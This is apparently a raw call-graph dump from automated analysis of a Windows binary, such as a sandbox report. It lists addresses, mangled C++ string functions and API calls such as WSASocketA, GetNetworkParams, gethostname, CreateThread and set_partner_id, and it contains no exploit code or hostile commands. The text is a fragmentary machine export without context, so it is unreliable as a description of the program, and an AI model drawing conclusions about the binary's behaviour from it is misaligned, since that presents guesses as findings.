??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38147->38202 38153 100b6876 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38149->38153 38153->38142 38154->38115 38156 100b0650 38154->38156 38155->38111 38157 100258ac 3 API calls 38156->38157 38158 100b0689 38157->38158 38159 100b06a4 38158->38159 38219 100e986d 12 API calls __EH_prolog 38158->38219 38161 100b06be ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38159->38161 38204 1006d7fe 38161->38204 38164 1008a210 38165 100b07d8 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38164->38165 38211 10071e70 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38165->38211 38179 1006d7fe 5 API calls 38178->38179 38180 1006eb89 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38179->38180 38181 100013d0 4 API calls 38180->38181 38182 1006ebcb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38181->38182 38183 10025980 2 API calls 38182->38183 38184 1006ec05 38183->38184 38184->38107 38185->38115 38186->38127 38188 10029940 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38187->38188 38189 1002992e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38187->38189 38192 10029969 38188->38192 38190 10029a60 38189->38190 38191 10025980 2 API calls 38190->38191 38193 10029a7a 38191->38193 38194 100299b7 38192->38194 38195 10029979 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD 38192->38195 38201 100c1190 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38193->38201 38198 100299c5 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?find_last_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 38194->38198 38196 1000f130 38195->38196 38197 10029996 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38196->38197 38197->38194 38199 10029a0a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38198->38199 38200 10029a3f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38198->38200 38199->38200 38200->38190 38201->38139 38202->38135 38203->38154 38220 10025930 38204->38220 38206 1006d808 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38208 1006d84c 38206->38208 38207 1006d89d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38209 10025980 2 API calls 38207->38209 38208->38207 38210 1006d8d2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38209->38210 38210->38164 38219->38159 38220->38206 38228 1002029e 38229 100202a8 __EH_prolog 38228->38229 38230 100258ac 3 API calls 38229->38230 38232 100202ba 38229->38232 38231 100202da 38230->38231 38231->38232 38234 10002e96 38231->38234 38237 1001c17d 38234->38237 38238 1001c187 __EH_prolog 38237->38238 38273 10001263 38238->38273 38242 1001c1bc 38284 10001000 RtlInitializeCriticalSection 38242->38284 38244 1001c248 38285 10001000 RtlInitializeCriticalSection 38244->38285 38246 1001c253 38247 1001c271 CreateEventA GetTickCount ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 38246->38247 38248 1001c2d7 Mailbox 38247->38248 38286 10001429 38248->38286 38250 1001c2fc _putenv GetLastError 38289 100122e9 38250->38289 38334 100011ff memset 38273->38334 38275 1000126b 38335 10001213 38275->38335 38277 10001272 38278 1000127c 38277->38278 38339 100011e7 _CxxThrowException 38277->38339 38280 10019a36 38278->38280 38281 10019a40 __EH_prolog 38280->38281 38341 10001000 RtlInitializeCriticalSection 38281->38341 38283 10019a78 38283->38242 38284->38244 38285->38246 38342 10025930 38286->38342 38288 10001433 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38288->38250 38334->38275 38340 100259a0 38335->38340 
38337 1000121f RtlInitializeCriticalSection 38338 10001257 38337->38338 38338->38277 38340->38337 38341->38283 38342->38288 38442 1000ef20 WSASocketA 38443 1000ef63 WSAIoctl 38442->38443 38444 1000ef4b 38442->38444 38443->38444 38450 1000ef8b 38443->38450 38445 10025980 2 API calls 38444->38445 38446 1000ef5c 38445->38446 38447 1000f004 38448 10025980 2 API calls 38447->38448 38449 1000f017 38448->38449 38450->38447 38451 1000efe7 38450->38451 38452 1000efc8 38450->38452 38451->38447 38454 1000efeb 38451->38454 38453 10025980 2 API calls 38452->38453 38456 1000efe0 38453->38456 38455 10025980 2 API calls 38454->38455 38457 1000effd 38455->38457 38458 41b760 38459 41b7a3 38458->38459 38460 41b7da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38459->38460 38461 41b7ef 38460->38461 38462 41b849 38461->38462 38464 41b861 38461->38464 38463 41b8b6 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38462->38463 38466 418004 38463->38466 38465 41b886 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38464->38465 38477 41b89f 38465->38477 38467 41b8c8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 38466->38467 38468 41b8db 38467->38468 38469 41b8e3 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38468->38469 38470 41b927 38468->38470 38472 418004 38469->38472 38471 41b948 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38470->38471 38476 41ba80 38470->38476 38474 418004 38471->38474 38475 41b8f5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 38472->38475 38473 41baa6 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38478 418004 38473->38478 38479 41b961 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38474->38479 38480 41b908 38475->38480 38476->38473 38524 41bb57 38476->38524 38481 41babf ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38478->38481 38482 418004 
38479->38482 38480->38470 38487 41b910 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38480->38487 38484 418004 38481->38484 38485 41b974 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38482->38485 38483 41bb7b ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38486 418004 38483->38486 38489 41bad2 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38484->38489 38490 418004 38485->38490 38491 41bb8d ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38486->38491 38487->38470 38488 41bc24 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38495 418004 38488->38495 38493 418004 38489->38493 38494 41b987 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38490->38494 38496 41bba0 38491->38496 38492 41bbc1 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38497 418004 38492->38497 38499 41bae5 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38493->38499 38500 418004 38494->38500 38501 41bc40 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2 38495->38501 38496->38492 38502 41bbe6 38496->38502 38498 41bbd3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38497->38498 38498->38502 38503 418004 38499->38503 38504 41b99a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38500->38504 38505 418004 38501->38505 38502->38488 38506 41baf8 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38503->38506 38507 418004 38504->38507 38508 41bc66 ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12 38505->38508 38509 418004 38506->38509 38510 41b9b7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38507->38510 38511 418004 38508->38511 38512 41bb15 
?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38509->38512 38513 418004 38510->38513 38514 41bc85 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2 38511->38514 38515 418004 38512->38515 38516 41b9cd ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38513->38516 38517 41bca4 38514->38517 38518 41bb2b ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38515->38518 38519 418004 38516->38519 38523 41bcb3 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38517->38523 38521 418004 38518->38521 38520 41b9e3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38519->38520 38526 41b9f9 38520->38526 38522 41bb41 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38521->38522 38522->38524 38525 41bcd2 38523->38525 38524->38483 38524->38496 38527 41bcdc ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38525->38527 38529 41bcf8 38525->38529 38526->38476 38528 41ba2a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38526->38528 38527->38529 38530 418004 38528->38530 38531 41bd33 ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38529->38531 38532 41bd7a 38529->38532 38533 41ba46 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38530->38533 38534 41bd48 38531->38534 38536 41be5a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38532->38536 38553 41bda6 38532->38553 38537 41ba5c 38533->38537 38534->38532 38538 41bd4f ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38534->38538 38535 41bffa ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38539 418004 38535->38539 38540 41be7b 38536->38540 38544 41ba67 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38537->38544 38541 418004 
38538->38541 38542 41c00e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38539->38542 38545 41bea5 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38540->38545 38543 41bd64 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38541->38543 38549 41c023 38542->38549 38543->38532 38544->38476 38546 41becd 38545->38546 38547 41beda ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38546->38547 38548 41befe 38547->38548 38550 41c0aa ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38549->38550 38551 41c0c3 38550->38551 38555 41c0d2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38551->38555 38553->38535 38553->38549 38555->38477 38559 422b60 38562 10053eb0 4 API calls 38559->38562 38564 10016f63 38559->38564 38568 1001a726 38559->38568 38560 422b8b 38562->38560 38565 10016f6b 38564->38565 38566 10016f81 38565->38566 38567 10016f7a ??3@YAXPAX 38565->38567 38566->38560 38567->38566 38569 1001a73a RtlEnterCriticalSection 38568->38569 38570 1001a86d 38568->38570 38571 1001a750 RtlLeaveCriticalSection 38569->38571 38572 1001a75b RtlLeaveCriticalSection 38569->38572 38570->38560 38571->38570 38573 1001a76f Mailbox 38572->38573 38573->38570 38574 1001a867 CoUninitialize 38573->38574 38574->38570 38575 1002c120 38576 1002c143 38575->38576 38579 1002be90 MultiByteToWideChar 38576->38579 38580 1002bf33 38579->38580 38581 1002bec9 GetLastError 38579->38581 38582 1000f130 38581->38582 38583 1002bedb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38582->38583 38584 100013d0 4 API calls 38583->38584 38585 1002bf0e 38584->38585 38586 1002bf23 _CxxThrowException 38585->38586 38586->38580 38587 1003cca0 RtlEnterCriticalSection 38589 1003cced 38587->38589 38588 1003cd61 RtlLeaveCriticalSection 38589->38588 38590 1003cd29 38589->38590 38592 1003cb10 38589->38592 38590->38588 38593 1003cb30 38592->38593 38594 1003cbd4 WSAEnumNetworkEvents 38593->38594 
38595 1003cbea WSAGetLastError 38594->38595 38597 1003cc14 38594->38597 38596 1003cc01 38595->38596 38596->38590 38597->38590 38598 100582a0 38622 1005cf10 38598->38622 38600 10058498 38602 100584af GetTickCount 38600->38602 38603 100585d9 38600->38603 38601 100582fe 38601->38600 38604 10058348 GetTickCount 38601->38604 38606 100258ac 3 API calls 38602->38606 38605 10009f50 Mailbox 2 API calls 38603->38605 38607 10057620 38604->38607 38608 100585ed 38605->38608 38615 100584e7 38606->38615 38609 10058387 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38607->38609 38610 10025980 2 API calls 38608->38610 38611 10053b90 6 API calls 38609->38611 38612 1005860d 38610->38612 38614 100583b6 38611->38614 38619 100583e2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38614->38619 38621 1005840f 38614->38621 38636 1005c260 CreateThread 38615->38636 38616 1005851b 38618 1005853d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38616->38618 38617 10058473 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38617->38600 38620 10058571 38618->38620 38619->38621 38620->38603 38621->38617 38637 10025ed0 38622->38637 38624 1005cf2f GetNetworkParams 38625 1005cf6c 38624->38625 38632 1005cf8b 38624->38632 38629 1005cf76 GetNetworkParams 38625->38629 38626 1005d008 38628 10025980 2 API calls 38626->38628 38627 1005cff0 38627->38626 38633 1005cfff ??_V@YAXPAX 38627->38633 38631 1005d025 38628->38631 38629->38632 38630 1005cfa2 inet_addr 38630->38632 38631->38601 38632->38626 38632->38627 38632->38630 38634 1005cfb1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38632->38634 38635 1005cfd5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38632->38635 38633->38626 38634->38632 38635->38632 38636->38616 38639 1005c250 9 API calls 38636->38639 38638 10025ed7 38637->38638 38638->38624 38638->38638 38640 1006f0a0 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38641 100013d0 4 API calls 38640->38641 38642 1006f189 38641->38642 38667 1006eae0 16 API calls 38642->38667 38668 10027330 38642->38668 38643 1006f1ab ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38646 1006f1f4 38643->38646 38665 1006f280 38643->38665 38644 10025980 2 API calls 38645 1006f520 38644->38645 38647 1006f217 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38646->38647 38648 1006f27c 38647->38648 38649 1006f2b5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38648->38649 38648->38665 38650 1006f2e7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38649->38650 38651 1006f323 38649->38651 38650->38651 38652 1006f338 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38651->38652 38653 1006f349 38651->38653 38652->38653 38654 1006f366 38653->38654 38655 1006f359 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38653->38655 38656 100258ac 3 API calls 38654->38656 38654->38665 38655->38654 38657 1006f3ad 38656->38657 38658 1006f3c4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38657->38658 38659 1006f456 38657->38659 38658->38659 38660 1006f480 38659->38660 38661 1006f46c 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38659->38661 38662 1006f490 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38660->38662 38663 1006f4a1 38660->38663 38661->38660 38662->38663 38664 1006f4b1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38663->38664 38663->38665 38664->38665 38665->38644 38667->38643 38669 10027351 FindFirstFileA 38668->38669 38671 10027380 FindClose 38669->38671 38672 10027369 38669->38672 38673 10025980 2 API calls 38671->38673 38674 10025980 2 API calls 38672->38674 38676 10027397 38673->38676 38675 10027379 38674->38675 38675->38643 38676->38643 38677 100b2320 38678 100258ac 3 API calls 38677->38678 38679 100b2358 38678->38679 38680 100b238e ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38679->38680 38711 10071870 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38680->38711 38682 100b23c7 38714 10071940 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38682->38714 38684 100b23d9 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38717 100717a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38684->38717 38686 100b2412 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38720 100e9b40 gethostname 38686->38720 38688 100b2448 38689 100b2459 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38688->38689 38690 100b248a 38689->38690 38691 100298f0 16 API calls 38690->38691 38692 100b2510 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38691->38692 38694 100b2543 38692->38694 38693 100298f0 16 API calls 38695 100b25c0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38693->38695 38694->38693 38696 100b25f3 38695->38696 38736 10089da0 RtlEnterCriticalSection 38696->38736 38712 100718c6 38711->38712 38713 100718f0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38712->38713 38713->38682 38715 1006d7fe 5 API calls 38714->38715 38716 100719be ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38715->38716 38716->38684 38718 1006d7fe 5 API calls 38717->38718 38719 1007181e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38718->38719 38719->38686 38721 100e9bab gethostbyname 38720->38721 38722 100e9b91 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38720->38722 38724 100e9bbd WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38721->38724 38725 100e9bd7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38721->38725 38723 100e9cbd 38722->38723 38728 10025980 2 API calls 38723->38728 38724->38723 38726 100e9bfd 38725->38726 38727 100e9c94 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38725->38727 38729 100e9c10 inet_ntoa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38726->38729 38731 100e9c32 inet_addr 38726->38731 38732 100e9c90 38726->38732 38733 100e9c50 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38726->38733 38727->38723 38730 100e9cdd 38728->38730 38729->38726 38729->38731 38730->38688 38731->38726 38732->38727 38733->38726 38734 100e9c67 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 38733->38734 38734->38726 38735 100e9ce4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38734->38735 38735->38723 38737 10027700 38736->38737 38739 42ea72 38741 42ea92 38739->38741 38743 42eaf3 38739->38743 38740 42eb0b ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 38742 42eb20 38740->38742 38741->38743 38744 42eac0 swprintf 38741->38744 38743->38740 38744->38740 38745 422af0 38748 10005460 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38745->38748 38746 422b27 38749 100054a4 38748->38749 38750 1000549f 38748->38750 38759 10011246 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38749->38759 38751 100054df ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38750->38751 38752 10025980 2 API calls 38751->38752 38753 100054f6 38752->38753 38753->38746 38755 100054ba init 38756 100054c7 38755->38756 38757 100054cb set_partner_id 38755->38757 38758 100054d6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38756->38758 38757->38758 38758->38751 38759->38755 38760 437770 38761 
39563->39564 39564->39558 39579 10048b40 socket 39567->39579 39586 10050810 39567->39586 39568 10047d46 39568->39557 39572 10045061 39571->39572 39574 1004506a 39571->39574 39572->39557 39573 1004510f AtlComPtrAssign 39575 1004512c 39573->39575 39574->39573 39577 10048b40 5 API calls 39575->39577 39578 10050810 2 API calls 39575->39578 39576 1004514c 39576->39557 39577->39576 39578->39576 39580 10048bac 39579->39580 39581 10048b6f WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39579->39581 39583 10048bcf 39580->39583 39584 10048bb3 setsockopt 39580->39584 39582 1021adf0 39581->39582 39585 10048b9d _CxxThrowException 39582->39585 39583->39568 39584->39583 39585->39580 39587 1005081d CreateIoCompletionPort 39586->39587 39588 1005083b 39586->39588 39590 10050835 GetLastError 39587->39590 39591 1005083e 39587->39591 39588->39568 39590->39588 39591->39568 39592 41c7a0 39595 10007781 39592->39595 39593 41c7d3 39596 1000778d 39595->39596 39597 10007792 39595->39597 39596->39593 39597->39596 39598 10027330 4 API calls 39597->39598 39598->39596 39599 10035a60 39602 1001bb3f 39599->39602 39600 10035a79 39603 1001bb86 39602->39603 39605 1001bb4d 39602->39605 39606 1001b499 39603->39606 39605->39600 39661 10025930 39606->39661 39608 1001b4a3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39609 1001b4f2 39608->39609 39614 1001b4eb 39608->39614 39613 1001b527 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39609->39613 39609->39614 39610 1001b909 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39611 1001b998 39610->39611 39612 10025980 2 API calls 39611->39612 39615 1001b9b5 39612->39615 39616 1001b54f 39613->39616 39614->39610 39615->39605 39617 1001b553 39616->39617 39662 10018301 39616->39662 39618 1001b8f9 
